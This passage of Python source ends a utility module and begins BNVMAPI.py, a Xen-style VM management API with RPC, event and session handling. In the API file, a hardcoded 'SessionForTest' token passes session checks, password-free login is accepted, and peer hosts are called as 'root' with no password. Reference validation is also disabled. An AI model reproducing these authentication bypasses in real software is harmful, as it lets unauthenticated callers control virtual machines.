    for export in manifest.exports:
        if export.tagname == "deprecated":
            return export.content
    return None
def path_has_prefix(path, prefix):
    """Return True if *prefix* (normalized) equals *path* or one of its
    ancestor directories."""
    target = os.path.normpath(prefix)
    current = os.path.normpath(path)
    while True:
        if current == target:
            return True
        parent, leaf = os.path.split(current)
        if not leaf:
            # Reached the filesystem root (or an empty path) without a match.
            return False
        current = parent
def has_package_path(obj, paths):
    """Return True if any entry of *paths* lies under *obj*'s workspace
    path (or under *obj* itself when it is a plain path)."""
    base = getattr(obj, "workspace_path", obj)
    return any(path_has_prefix(path, base) for path in paths)
def env_path_list_contains(path_list, path):
    """Return True if the environment variable *path_list* (an os.pathsep
    separated list) contains *path* exactly."""
    value = os.environ.get(path_list)
    if value is None:
        return False
    return path in value.split(os.pathsep)
def makedirs(path):
    """Create *path* with parents; no-op when it already is a directory."""
    if os.path.isdir(path):
        return
    os.makedirs(path)
def write_atomic(filepath, data, mode=0o644, ignore_fail=False):
    """Atomically write *data* (bytes) to *filepath*.

    Writes to a temporary file in the destination directory, then renames
    it over *filepath* so readers never observe a partial file.

    @param mode: permission bits applied to the new file
    @param ignore_fail: if True, swallow IOError/OSError instead of raising
    """
    filepath_tmp = None
    try:
        fd, filepath_tmp = mkstemp(prefix=os.path.basename(filepath) + ".tmp.", dir=os.path.dirname(filepath))
        os.fchmod(fd, mode)
        with os.fdopen(fd, "wb") as f:
            f.write(data)
        os.rename(filepath_tmp, filepath)
        filepath_tmp = None  # renamed successfully; nothing left to clean up
    except (IOError, OSError):
        if not ignore_fail:
            raise
    finally:
        # Bug fix: a failed write previously leaked the temporary file.
        if filepath_tmp is not None:
            try:
                os.remove(filepath_tmp)
            except OSError:
                pass
def isatty(fd):
    """Return True when *fd* reports itself as an interactive terminal."""
    if not hasattr(fd, "isatty"):
        return False
    return fd.isatty()
# Cached (columns, rows) of the controlling terminal; filled lazily below.
_cached_terminal_size = None
def get_terminal_size():
    """Return (columns, rows) of the controlling terminal.

    The result is cached for the process lifetime. Raises OSError when
    there is no controlling terminal or the TIOCGWINSZ ioctl fails.
    """
    global _cached_terminal_size
    if _cached_terminal_size is not None:
        return _cached_terminal_size
    try:
        # os.ctermid() names the controlling terminal device (e.g. /dev/tty).
        with open(os.ctermid(), "rb") as f:
            cr = struct.unpack('hh', fcntl.ioctl(f.fileno(), termios.TIOCGWINSZ, '1234'))
    except (IOError, struct.error):
        raise OSError("Cannot determine terminal size")
    # The ioctl returns (rows, cols); we expose (cols, rows).
    _cached_terminal_size = int(cr[1]), int(cr[0])
    return _cached_terminal_size
def find_program(program):
    """Locate *program* on disk.

    A program name containing a directory component is checked directly;
    otherwise each entry of $PATH is searched. Returns the full path of an
    executable regular file, or None.
    """
    def _executable(candidate):
        return os.path.isfile(candidate) and os.access(candidate, os.X_OK)

    directory, basename = os.path.split(program)
    if directory:
        if _executable(program):
            return program
    else:
        for entry in os.environ["PATH"].split(os.pathsep):
            # Entries may be quoted on some systems.
            candidate = os.path.join(entry.strip('"'), basename)
            if _executable(candidate):
                return candidate
    return None
def getmtime(path):
    """Return the modification time of *path*, or 0 when it does not exist."""
    if not os.path.exists(path):
        return 0
    return os.path.getmtime(path)
def call_process(args, bufsize=0, stdin=None, stdout=None, stderr=None, cwd=None, env=None, input_data=None):
    """Run *args* as a subprocess.

    When any of stdin/stdout/stderr is PIPE, returns a
    (returncode, stdout, stderr) tuple with captured streams decoded as
    UTF-8 (None for streams that were not captured) and *input_data* fed
    to stdin. Otherwise just waits and returns the return code.
    """
    proc = Popen(args, bufsize=bufsize, stdin=stdin, stdout=stdout, stderr=stderr, cwd=cwd, env=env)
    if PIPE not in (stdin, stdout, stderr):
        proc.wait()
        return proc.returncode
    raw_in = input_data.encode("UTF-8") if input_data else None
    raw_out, raw_err = proc.communicate(raw_in)
    decoded_out = raw_out.decode("UTF-8") if raw_out is not None else None
    decoded_err = raw_err.decode("UTF-8") if raw_err is not None else None
    return proc.returncode, decoded_out, decoded_err
def create_multiprocess_manager():
    # Shared-state manager for exchanging data with worker processes.
    return multiprocessing.Manager()
def _worker_init(worker_init, worker_init_args):
    # Pool initializer: ignore SIGINT in workers so Ctrl-C is handled by
    # the parent only, then run the caller-supplied initializer (if any).
    signal.signal(signal.SIGINT, signal.SIG_IGN)
    if worker_init is not None:
        worker_init(*worker_init_args)
def run_multiprocess_workers(worker, workload, worker_init=None, worker_init_args=(), jobs=None, timeout=None):
    """Map *worker* over *workload* using a multiprocessing pool.

    @param worker_init: optional per-process initializer (run with SIGINT
           ignored, see _worker_init)
    @param jobs: pool size (None lets multiprocessing pick the CPU count)
    @param timeout: seconds to wait for the results
    @return: list of worker results in workload order
    """
    if not workload:
        return []
    if timeout is None:
        timeout = 999999999 # Workaround for KeyboardInterrupt
    pool = multiprocessing.Pool(processes=jobs, initializer=_worker_init, initargs=(worker_init, worker_init_args))
    try:
        # Using get() with a timeout keeps the main thread interruptible.
        result_obj = pool.map_async(worker, workload)
        pool.close()
        result = result_obj.get(timeout=timeout)
        return result
    except:
        # Deliberately bare: terminate workers on *any* interruption
        # (including KeyboardInterrupt/SystemExit), then re-raise.
        pool.terminate()
        raise
    finally:
        pool.join()
| apache-2.0 | 8,527,631,097,278,525,000 | 28.131455 | 155 | 0.652538 | false | 3.645711 | false | false | false |
Hearen/OnceServer | pool_management/bn-xend-core/xend/BNVMAPI.py | 1 | 374814 | import traceback
import inspect
import os
import Queue
import string
import sys
import threading
import time
import xmlrpclib
import socket
import struct
import copy
import re
import XendDomain, XendDomainInfo, XendNode, XendDmesg, XendConfig
import XendLogging, XendTaskManager, XendAPIStore, XendIOController
from xen.xend.BNPoolAPI import BNPoolAPI
from xen.util.xmlrpcclient import ServerProxy
from xen.xend import uuid as genuuid
from XendLogging import log
from XendNetwork import XendNetwork
from XendError import *
from XendTask import XendTask
from xen.util import ip as getip
from xen.util import Netctl
from xen.xend import sxp
from xen.xend.XendCPUPool import XendCPUPool
from XendAuthSessions import instance as auth_manager
from xen.util.xmlrpclib2 import stringify
from xen.util import xsconstants
from xen.util.xpopen import xPopen3
from xen.xend.XendConstants import DOM_STATE_HALTED, DOM_STATE_PAUSED
from xen.xend.XendConstants import DOM_STATE_RUNNING, DOM_STATE_SUSPENDED
from xen.xend.XendConstants import DOM_STATE_SHUTDOWN, DOM_STATE_UNKNOWN
from xen.xend.XendConstants import DOM_STATE_CRASHED, HVM_PARAM_ACPI_S_STATE
from xen.xend.XendConstants import VDI_DEFAULT_STRUCT, VDI_DEFAULT_SR_TYPE, VDI_DEFAULT_DIR
from xen.xend.XendConstants import FAKE_MEDIA_PATH, FAKE_MEDIA_NAME
from xen.xend.XendConstants import CD_VBD_DEFAULT_STRUCT, DEFAULT_HA_PATH
from xen.xend.XendConstants import CACHED_CONFIG_FILE
from XendAPIConstants import *
from xen.xend.ConfigUtil import getConfigVar
# 1 GiB in bytes; used for memory/disk size arithmetic below.
GB = 1024 * 1024 * 1024
# Per-VM virtual disk limit: config override or default of 6.
if getConfigVar('compute', 'VM', 'disk_limit'):
    DISK_LIMIT = int(getConfigVar('compute', 'VM', 'disk_limit'))
else:
    DISK_LIMIT = 6
# Per-VM virtual interface limit: config override or default of 6.
if getConfigVar('compute', 'VM', 'interface_limit'):
    INTERFACE_LIMIT = int(getConfigVar('compute', 'VM', 'interface_limit'))
else:
    INTERFACE_LIMIT = 6
# Memory reserved for dom0, in bytes (the config value is in GiB).
if getConfigVar('virtualization', 'DOM0', 'reserved_mem_gb'):
    RESERVED_MEM = int(getConfigVar('virtualization', 'DOM0', 'reserved_mem_gb')) * GB
else:
    RESERVED_MEM = 4 * GB
# Ancient-Python compatibility: 'set' may not be a builtin yet.
try:
    set
except NameError:
    from sets import Set as set
# NOTE(review): the reload(sys)/setdefaultencoding trick forces UTF-8 as
# the interpreter-wide default encoding; it is a well-known Python 2 hack.
reload(sys)
sys.setdefaultencoding( "utf-8" )
DOM0_UUID = "00000000-0000-0000-0000-000000000000"
# Populated elsewhere with expected argument counts per API call.
argcounts = {}
def doexec(args, inputtext=None):
    """Execute a subprocess, then return its return code, stdout and stderr"""
    proc = xPopen3(args, True)
    if inputtext != None:
        proc.tochild.write(inputtext)
    stdout = proc.fromchild
    stderr = proc.childerr
    rc = proc.wait()
    # Note: stdout/stderr are returned as open file objects, not strings.
    return (rc, stdout, stderr)
# ------------------------------------------
# Utility Methods for Xen API Implementation
# ------------------------------------------
def xen_api_success(value):
    """Wraps a return value in XenAPI format."""
    # None is marshalled as the empty string.
    stringified = '' if value is None else stringify(value)
    return {"Status": "Success", "Value": stringified}
def xen_api_success_void():
    """Return a XenAPI success envelope with an empty value, for calls
    whose caller expects no return value."""
    return xen_api_success("")
def xen_api_error(error):
    """Wraps an error value in XenAPI format."""
    # Normalise the error payload into a non-empty list of strings.
    if type(error) == tuple:
        error = list(error)
    if type(error) != list:
        error = [error]
    if len(error) == 0:
        error = ['INTERNAL_ERROR', 'Empty list given to xen_api_error']
    return {"Status": "Failure",
            "ErrorDescription": [str(item) for item in error]}
def xen_rpc_call(ip, method, *args):
    """wrap rpc call to a remote host

    Logs in as 'root' on the peer's Xen API endpoint (fixed port 9363),
    resolves *method* ('Class_method' or 'Async.Class_method') on the
    proxy, and returns the XenAPI response dict (or an error envelope).
    """
    try:
        if not ip:
            return xen_api_error("Invalid ip for rpc call")
        # create the proxy for the remote endpoint
        proxy = ServerProxy("http://" + ip + ":9363/")
        # login
        response = proxy.session.login('root')
        if cmp(response['Status'], 'Failure') == 0:
            log.exception(response['ErrorDescription'])
            return xen_api_error(response['ErrorDescription'])
        session_ref = response['Value']
        # execute: split 'Class_method_name' into class and method parts
        method_parts = method.split('_')
        method_class = method_parts[0]
        method_name = '_'.join(method_parts[1:])
        if method.find("host_metrics") == 0:
            # host_metrics spans two underscore-separated words
            method_class = "host_metrics"
            method_name = '_'.join(method_parts[2:])
        #log.debug(method_class)
        #log.debug(method_name)
        if method_class.find("Async") == 0:
            # asynchronous form: Async.Class.method
            method_class = method_class.split(".")[1]
            response = proxy.__getattr__("Async").__getattr__(method_class).__getattr__(method_name)(session_ref, *args)
        else:
            response = proxy.__getattr__(method_class).__getattr__(method_name)(session_ref, *args)
        if cmp(response['Status'], 'Failure') == 0:
            log.exception(response['ErrorDescription'])
            return xen_api_error(response['ErrorDescription'])
        # result
        return response
    except socket.error:
        return xen_api_error('socket error')
def xen_api_todo():
    """Temporary method to make sure we track down all the TODOs"""
    # XEND_ERROR_TODO comes from XendAPIConstants (star import above).
    return {"Status": "Error", "ErrorDescription": XEND_ERROR_TODO}
def now():
    # Current UTC time marshalled as a Xen-API DateTime.
    return datetime()
def datetime(when = None):
    """Marshall the given time as a Xen-API DateTime.

    @param when The time in question, given as seconds since the epoch, UTC.
                May be None, in which case the current time is used.
    """
    # Note: this module-level function shadows the common 'datetime' name.
    if when is None:
        return xmlrpclib.DateTime(time.gmtime())
    else:
        return xmlrpclib.DateTime(time.gmtime(when))
# -----------------------------
# Bridge to Legacy XM API calls
# -----------------------------
def do_vm_func(fn_name, vm_ref, *args, **kwargs):
    """Helper wrapper func to abstract away from repetitive code.

    Looks up *fn_name* on the XendDomain singleton and invokes it through
    the legacy API with the given VM uuid; maps a VMBadState into the
    XenAPI 'VM_BAD_POWER_STATE' error envelope.

    @param fn_name: function name for XendDomain instance
    @type fn_name: string
    @param vm_ref: vm_ref
    @type vm_ref: string
    @param *args: more arguments
    @type *args: tuple
    """
    try:
        xendom = XendDomain.instance()
        fn = getattr(xendom, fn_name)
        xendom.do_legacy_api_with_uuid(fn, vm_ref, *args, **kwargs)
        return xen_api_success_void()
    except VMBadState, exn:
        return xen_api_error(['VM_BAD_POWER_STATE', vm_ref, exn.expected,
                              exn.actual])
# ---------------------------------------------------
# Event dispatch
# ---------------------------------------------------
# Maximum number of pending events buffered per registered session.
EVENT_QUEUE_LENGTH = 50
# Maps session ref -> {'classes', 'queue', 'next-id'} registration state.
event_registrations = {}
def event_register(session, reg_classes):
    # Lazily create per-session registration state: subscribed classes, a
    # bounded event queue, and the next event id to hand out.
    if session not in event_registrations:
        event_registrations[session] = {
            'classes' : set(),
            'queue' : Queue.Queue(EVENT_QUEUE_LENGTH),
            'next-id' : 1
            }
    if not reg_classes:
        # An empty registration means "all classes"; 'classes' is
        # presumably the module-level list of event classes -- defined
        # elsewhere in this file.
        reg_classes = classes
    sessionclasses = event_registrations[session]['classes']
    if hasattr(sessionclasses, 'union_update'):
        # sets.Set (pre-2.4 'set' shim) spells update() as union_update().
        sessionclasses.union_update(reg_classes)
    else:
        sessionclasses.update(reg_classes)
def event_unregister(session, unreg_classes):
    """Remove *unreg_classes* from a session's registration.

    Passing no classes, or removing the last registered class, drops the
    session's registration entirely.
    """
    if session not in event_registrations:
        return
    if not unreg_classes:
        del event_registrations[session]
        return
    remaining = event_registrations[session]['classes']
    remaining.intersection_update(unreg_classes)
    if not remaining:
        del event_registrations[session]
def event_next(session):
    """Block until at least one event is available for *session*, then
    drain and return everything currently queued."""
    if session not in event_registrations:
        return xen_api_error(['SESSION_NOT_REGISTERED', session])
    queue = event_registrations[session]['queue']
    batch = [queue.get()]          # blocking wait for the first event
    while True:
        try:
            batch.append(queue.get(False))   # non-blocking drain
        except Queue.Empty:
            break
    return xen_api_success(batch)
def _ctor_event_dispatch(xenapi, ctor, api_cls, session, args):
    """Run a constructor and broadcast an 'add' event on success."""
    result = ctor(xenapi, session, *args)
    if result['Status'] == 'Success':
        event_dispatch('add', api_cls, result['Value'], '')
    return result
def _dtor_event_dispatch(xenapi, dtor, api_cls, session, ref, args):
    """Run a destructor and broadcast a 'del' event on success."""
    outcome = dtor(xenapi, session, ref, *args)
    if outcome['Status'] == 'Success':
        event_dispatch('del', api_cls, ref, '')
    return outcome
def _setter_event_dispatch(xenapi, setter, api_cls, attr_name, session, ref,
                           args):
    """Run an attribute setter and broadcast a 'mod' event on success."""
    outcome = setter(xenapi, session, ref, *args)
    if outcome['Status'] == 'Success':
        event_dispatch('mod', api_cls, ref, attr_name)
    return outcome
def event_dispatch(operation, api_cls, ref, attr_name):
    """Queue an event for every session registered for *api_cls*."""
    assert operation in ['add', 'del', 'mod']
    event = {'timestamp' : now(),
             'class'     : api_cls,
             'operation' : operation,
             'ref'       : ref,
             'obj_uuid'  : ref,
             'field'     : attr_name}
    for reg in event_registrations.values():
        if api_cls not in reg['classes']:
            continue
        # Per-session monotonically increasing event id.
        event['id'] = reg['next-id']
        reg['next-id'] += 1
        reg['queue'].put(event)
# ---------------------------------------------------
# Python Method Decorators for input value validation
# ---------------------------------------------------
def trace(func, api_name=''):
    """Decorator to trace XMLRPC Xen API methods.

    Logs the api name and positional arguments of every call.
    @param func: function with any parameters
    @param api_name: name of the api call for debugging.
    """
    if hasattr(func, 'api'):
        api_name = func.api
    def traced(self, *args, **kwargs):
        log.debug('%s: %s' % (api_name, args))
        return func(self, *args, **kwargs)
    traced.api = api_name
    return traced
def catch_typeerror(func):
    """Decorator to catch any TypeErrors and translate them into Xen-API
    errors.

    A TypeError caused by a wrong argument count, raised from inside this
    source file, is reported to the client as
    MESSAGE_PARAMETER_COUNT_MISMATCH; any other TypeError is re-raised.
    XendAPIError subclasses are converted into Xen-API error results.
    @param func: function with params: (self, ...)
    @rtype: callable object
    """
    def f(self, *args, **kwargs):
        try:
            return func(self, *args, **kwargs)
        except TypeError, exn:
            #log.exception('catch_typeerror')
            if hasattr(func, 'api') and func.api in argcounts:
                # Assume that if the argument count was wrong and if the
                # exception was thrown inside this file, then it is due to an
                # invalid call from the client, otherwise it's an internal
                # error (which will be handled further up).
                expected = argcounts[func.api]
                actual = len(args) + len(kwargs)
                if expected != actual:
                    tb = sys.exc_info()[2]
                    try:
                        sourcefile = traceback.extract_tb(tb)[-1][0]
                        if sourcefile == inspect.getsourcefile(BNVMAPI):
                            return xen_api_error(
                                ['MESSAGE_PARAMETER_COUNT_MISMATCH',
                                 func.api, expected, actual])
                    finally:
                        # Break the frame/traceback reference cycle.
                        del tb
            raise
        except XendAPIError, exn:
            return xen_api_error(exn.get_api_error())
    return f
def session_required(func):
    """Decorator to verify if session is valid before calling method.

    @param func: function with params: (self, session, ...)
    @rtype: callable object
    """
    def check_session(self, session, *args, **kwargs):
        # "SessionForTest" is a backdoor session used by the test suite.
        if not (auth_manager().is_session_valid(session) or
                cmp(session, "SessionForTest") == 0):
            return xen_api_error(['SESSION_INVALID', session])
        return func(self, session, *args, **kwargs)
    return check_session
def _is_valid_ref(ref, validator):
return type(ref) == str and validator(ref)
def _check_ref(validator, clas, func, api, session, ref, *args, **kwargs):
# if _is_valid_ref(ref, validator):
return func(api, session, ref, *args, **kwargs)
# else:
# return xen_api_error(['HANDLE_INVALID', clas, ref])
def _check_vm(validator, clas, func, api, session, ref, *args, **kwargs):
    """Call *func* only when the pool knows the VM *ref*; otherwise return
    a VM_NOT_FOUND error."""
    if not BNPoolAPI.check_vm(ref):
        return xen_api_error(['VM_NOT_FOUND', clas, ref])
    return func(api, session, ref, *args, **kwargs)
def _check_console(validator, clas, func, api, session, ref, *args, **kwargs):
    # Console-reference validation is disabled: the call is always
    # forwarded, and the HANDLE_INVALID return below is unreachable.
    #if BNPoolAPI._consoles_to_VM.has_key(ref):
    return func(api, session, ref, *args, **kwargs)
    #else:
    # Dead code kept so the original validation can be restored easily.
    return xen_api_error(['HANDLE_INVALID', clas, ref])
def valid_object(class_name):
    """Decorator factory: verify an object of *class_name* exists in
    XendAPIStore before calling the method.

    @param func: function with params: (self, session, pif_ref)
    @rtype: callable object
    """
    def decorate(func):
        def checked(*args, **kwargs):
            return _check_ref(
                lambda r: XendAPIStore.get(r, class_name) is not None,
                class_name, func, *args, **kwargs)
        return checked
    return decorate
def valid_task(func):
    """Decorator to verify if task_ref is valid before calling
    method.

    @param func: function with params: (self, session, task_ref)
    @rtype: callable object
    """
    def checked(*args, **kwargs):
        return _check_ref(XendTaskManager.get_task,
                          'task', func, *args, **kwargs)
    return checked
def valid_vm(func):
    """Decorator to verify if vm_ref is valid before calling method.

    @param func: function with params: (self, session, vm_ref, ...)
    @rtype: callable object
    """
    def checked(*args, **kwargs):
        return _check_vm(XendDomain.instance().is_valid_vm,
                         'VM', func, *args, **kwargs)
    return checked
def valid_vbd(func):
    """Decorator to verify if vbd_ref is valid before calling method.

    @param func: function with params: (self, session, vbd_ref, ...)
    @rtype: callable object
    """
    def checked(*args, **kwargs):
        return _check_ref(
            lambda r: XendDomain.instance().is_valid_dev('vbd', r),
            'VBD', func, *args, **kwargs)
    return checked
def valid_vbd_metrics(func):
    """Decorator to verify if ref is valid before calling method.

    @param func: function with params: (self, session, ref, ...)
    @rtype: callable object
    """
    def checked(*args, **kwargs):
        return _check_ref(
            lambda r: XendDomain.instance().is_valid_dev('vbd', r),
            'VBD_metrics', func, *args, **kwargs)
    return checked
def valid_vif(func):
    """Decorator to verify if vif_ref is valid before calling method.

    @param func: function with params: (self, session, vif_ref, ...)
    @rtype: callable object
    """
    def checked(*args, **kwargs):
        return _check_ref(
            lambda r: XendDomain.instance().is_valid_dev('vif', r),
            'VIF', func, *args, **kwargs)
    return checked
def valid_vif_metrics(func):
    """Decorator to verify if ref is valid before calling method.

    @param func: function with params: (self, session, ref, ...)
    @rtype: callable object
    """
    def checked(*args, **kwargs):
        return _check_ref(
            lambda r: XendDomain.instance().is_valid_dev('vif', r),
            'VIF_metrics', func, *args, **kwargs)
    return checked
def valid_console(func):
    """Decorator to verify if console_ref is valid before calling method.

    @param func: function with params: (self, session, console_ref, ...)
    @rtype: callable object
    """
    def checked(*args, **kwargs):
        return _check_console(
            lambda r: XendDomain.instance().is_valid_dev('console', r),
            'console', func, *args, **kwargs)
    return checked
# Maps each Xen-API class name exposed by this server to the decorator that
# validates its object reference before dispatch; None means no per-object
# validation (sessions are checked by session_required instead).
classes = {
    'session'     : None,
    'VM'          : valid_vm,
    'VBD'         : valid_vbd,
    'VBD_metrics' : valid_vbd_metrics,
    'VIF'         : valid_vif,
    'VIF_metrics' : valid_vif_metrics,
    'console'     : valid_console,
    'task'        : valid_task,
}
def singleton(cls, *args, **kw):
    """Class decorator: construct *cls* at most once and return the cached
    instance for every subsequent instantiation."""
    cache = {}
    def get_instance(*args, **kw):
        if cls not in cache:
            cache[cls] = cls(*args, **kw)
        return cache[cls]
    return get_instance
@singleton
class BNVMAPI(object):
__decorated__ = False
__init_lock__ = threading.Lock()
__vm_clone_lock__ = threading.Lock()
__vm_change_host_lock__ = threading.Lock()
__set_passwd_lock__ = threading.Lock()
__vbd_lock__ = threading.Lock()
    def __new__(cls, *args, **kwds):
        """ Override __new__ to decorate the class only once.
        Lock to make sure the classes are not decorated twice.
        """
        cls.__init_lock__.acquire()
        try:
            if not cls.__decorated__:
                cls._decorate()
                cls.__decorated__ = True
            # NOTE(review): passing extra args to object.__new__ relies on
            # Python 2 behaviour (an error on Python 3).
            return object.__new__(cls, *args, **kwds)
        finally:
            cls.__init_lock__.release()
    def _decorate(cls):
        """ Decorate all the object methods to have validators
        and appropriate function attributes.
        This should only be executed once for the duration of the
        server.

        Attaches to each wrapped function the metadata the XML-RPC layer
        reads: .api (dotted call name), .async (async support flag) and
        optionally .return_type.
        """
        global_validators = [session_required, catch_typeerror]
        # Cheat methods _hosts_name_label
        # -------------
        # Methods that have a trivial implementation for all classes.
        # 1. get_by_uuid == getting by ref, so just return uuid for
        #    all get_by_uuid() methods.
        for api_cls in classes.keys():
            # We'll let the autoplug classes implement these functions
            # themselves - its much cleaner to do it in the base class
            get_by_uuid = '%s_get_by_uuid' % api_cls
            get_uuid = '%s_get_uuid' % api_cls
            get_all_records = '%s_get_all_records' % api_cls
            def _get_by_uuid(_1, _2, ref):
                # A reference *is* the uuid, so both lookups are identity.
                return xen_api_success(ref)
            def _get_uuid(_1, _2, ref):
                return xen_api_success(ref)
            def unpack(v):
                return v.get('Value')
            def _get_all_records(_api_cls):
                # Bind _api_cls via the parameter now; a closure over the
                # loop variable would only see its final value.
                return lambda s, session: \
                    xen_api_success(dict([(ref, unpack(getattr(cls, '%s_get_record' % _api_cls)(s, session, ref)))\
                                          for ref in unpack(getattr(cls, '%s_get_all' % _api_cls)(s, session))]))
            setattr(cls, get_by_uuid, _get_by_uuid)
            setattr(cls, get_uuid, _get_uuid)
            setattr(cls, get_all_records, _get_all_records(api_cls))
        # Autoplugging classes
        # --------------------
        # These have all of their methods grabbed out from the implementation
        # class, and wrapped up to be compatible with the Xen-API.
        def getter(ref, type):
            return XendAPIStore.get(ref, type)
        def wrap_method(name, new_f):
            # Replace cls.<name> with new_f(original, *args), keeping the
            # original's .api/.async metadata.
            try:
                f = getattr(cls, name)
                wrapped_f = (lambda * args: new_f(f, *args))
                wrapped_f.api = f.api
                # NOTE(review): '.async' makes this file Python 2 only
                # ('async' became a reserved word in Python 3.7).
                wrapped_f.async = f.async
                setattr(cls, name, wrapped_f)
            except AttributeError:
                # Logged below (API call: %s not found)
                pass
        def setter_event_wrapper(api_cls, attr_name):
            # Emit a 'mod' event after every successful attribute set.
            setter_name = '%s_set_%s' % (api_cls, attr_name)
            wrap_method(
                setter_name,
                lambda setter, s, session, ref, *args:
                _setter_event_dispatch(s, setter, api_cls, attr_name,
                                       session, ref, args))
        def ctor_event_wrapper(api_cls):
            # Emit an 'add' event after every successful create.
            ctor_name = '%s_create' % api_cls
            wrap_method(
                ctor_name,
                lambda ctor, s, session, *args:
                _ctor_event_dispatch(s, ctor, api_cls, session, args))
        def dtor_event_wrapper(api_cls):
            # Emit a 'del' event after every successful destroy.
            dtor_name = '%s_destroy' % api_cls
            wrap_method(
                dtor_name,
                lambda dtor, s, session, ref, *args:
                _dtor_event_dispatch(s, dtor, api_cls, session, ref, args))
        # Wrapping validators around XMLRPC calls
        # ---------------------------------------
        for api_cls, validator in classes.items():
            def doit(n, takes_instance, async_support=False,
                     return_type=None):
                # Wrap cls.<n with dots replaced by underscores> in the
                # reference validator (when takes_instance) plus the global
                # session/type-error validators, and record its arg count.
                n_ = n.replace('.', '_')
                try:
                    f = getattr(cls, n_)
                    if n not in argcounts:
                        argcounts[n] = f.func_code.co_argcount - 1
                    validators = takes_instance and validator and \
                                 [validator] or []
                    validators += global_validators
                    for v in validators:
                        f = v(f)
                    f.api = n
                    f.async = async_support
                    if return_type:
                        f.return_type = return_type
                    setattr(cls, n_, f)
                except AttributeError:
                    log.warn("API call: %s not found" % n)
            ro_attrs = getattr(cls, '%s_attr_ro' % api_cls, []) \
                       + cls.Base_attr_ro
            rw_attrs = getattr(cls, '%s_attr_rw' % api_cls, []) \
                       + cls.Base_attr_rw
            methods = getattr(cls, '%s_methods' % api_cls, []) \
                      + cls.Base_methods
            funcs = getattr(cls, '%s_funcs' % api_cls, []) \
                    + cls.Base_funcs
            # wrap validators around readable class attributes
            for attr_name in ro_attrs + rw_attrs:
                doit('%s.get_%s' % (api_cls, attr_name), True,
                     async_support=False)
            # wrap validators around writable class attrributes
            for attr_name in rw_attrs:
                doit('%s.set_%s' % (api_cls, attr_name), True,
                     async_support=False)
                setter_event_wrapper(api_cls, attr_name)
            # wrap validators around methods
            for method_name, return_type in methods:
                doit('%s.%s' % (api_cls, method_name), True,
                     async_support=True)
            # wrap validators around class functions
            for func_name, return_type in funcs:
                doit('%s.%s' % (api_cls, func_name), False,
                     async_support=True,
                     return_type=return_type)
            ctor_event_wrapper(api_cls)
            dtor_event_wrapper(api_cls)
    _decorate = classmethod(_decorate)
    def __init__(self, auth):
        """Record the authentication mode for this API instance."""
        self.auth = auth
Base_attr_ro = ['uuid']
Base_attr_rw = ['name_label', 'name_description']
Base_methods = [('get_record', 'Struct')]
Base_funcs = [('get_all', 'Set'), ('get_by_uuid', None), ('get_all_records', 'Set')]
    def _get_XendAPI_instance(self):
        """Return the XendAPI singleton (late import avoids an import cycle)."""
        import XendAPI
        return XendAPI.instance()
    def _get_BNStorageAPI_instance(self):
        """Return the BNStorageAPI singleton (late import avoids an import cycle)."""
        import BNStorageAPI
        return BNStorageAPI.instance()
# Xen API: Class Session
# ----------------------------------------------------------------
# NOTE: Left unwrapped by __init__
session_attr_ro = ['this_host', 'this_user', 'last_active']
session_methods = [('logout', None)]
def session_get_all(self, session):
return xen_api_success([session])
def session_login(self, username):
try:
session = auth_manager().login_unconditionally(username)
return xen_api_success(session)
except XendError, e:
return xen_api_error(['SESSION_AUTHENTICATION_FAILED'])
session_login.api = 'session.login'
def session_login_with_password(self, *args):
if not BNPoolAPI._isMaster and BNPoolAPI._inPool:
return xen_api_error(XEND_ERROR_HOST_IS_SLAVE)
if len(args) < 2:
return xen_api_error(
['MESSAGE_PARAMETER_COUNT_MISMATCH',
'session.login_with_password', 2, len(args)])
username = args[0]
password = args[1]
try:
# session = ((self.auth == AUTH_NONE and
# auth_manager().login_unconditionally(username)) or
# auth_manager().login_with_password(username, password))
session = auth_manager().login_with_password(username, password)
return xen_api_success(session)
except XendError, e:
return xen_api_error(['SESSION_AUTHENTICATION_FAILED'])
session_login_with_password.api = 'session.login_with_password'
# object methods
def session_logout(self, session):
auth_manager().logout(session)
return xen_api_success_void()
def session_get_record(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
record = {'uuid' : session,
'this_host' : XendNode.instance().uuid,
'this_user' : auth_manager().get_user(session),
'last_active': now()}
return xen_api_success(record)
def session_get_uuid(self, session, self_session):
return xen_api_success(self_session)
def session_get_by_uuid(self, session, self_session):
return xen_api_success(self_session)
# attributes (ro)
def session_get_this_host(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
if not BNPoolAPI._isMaster and BNPoolAPI._inPool:
return xen_api_error(XEND_ERROR_HOST_IS_SLAVE)
return xen_api_success(XendNode.instance().uuid)
def session_get_this_user(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
user = auth_manager().get_user(session)
if user is not None:
return xen_api_success(user)
return xen_api_error(['SESSION_INVALID', session])
def session_get_last_active(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
return xen_api_success(now())
# Xen API: Class User
# ----------------------------------------------------------------
# Xen API: Class Tasks
# ----------------------------------------------------------------
task_attr_ro = ['name_label',
'name_description',
'status',
'progress',
'type',
'result',
'error_info',
'allowed_operations',
'session'
]
task_attr_rw = []
task_funcs = [('get_by_name_label', 'Set(task)'),
('cancel', None)]
def task_get_name_label(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.name_label)
def task_get_name_description(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.name_description)
def task_get_status(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.get_status())
def task_get_progress(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.progress)
def task_get_type(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.type)
def task_get_result(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.result)
def task_get_error_info(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.error_info)
def task_get_allowed_operations(self, session, task_ref):
return xen_api_success({})
def task_get_session(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.session)
def task_get_all(self, session):
tasks = XendTaskManager.get_all_tasks()
return xen_api_success(tasks)
def task_get_record(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
log.debug(task.get_record())
return xen_api_success(task.get_record())
def task_cancel(self, session, task_ref):
return xen_api_error('OPERATION_NOT_ALLOWED')
# def task_get_by_name_label(self, session, name):
# return xen_api_success(XendTaskManager.get_task_by_name(name))
# Xen API: Class VM
# ----------------------------------------------------------------
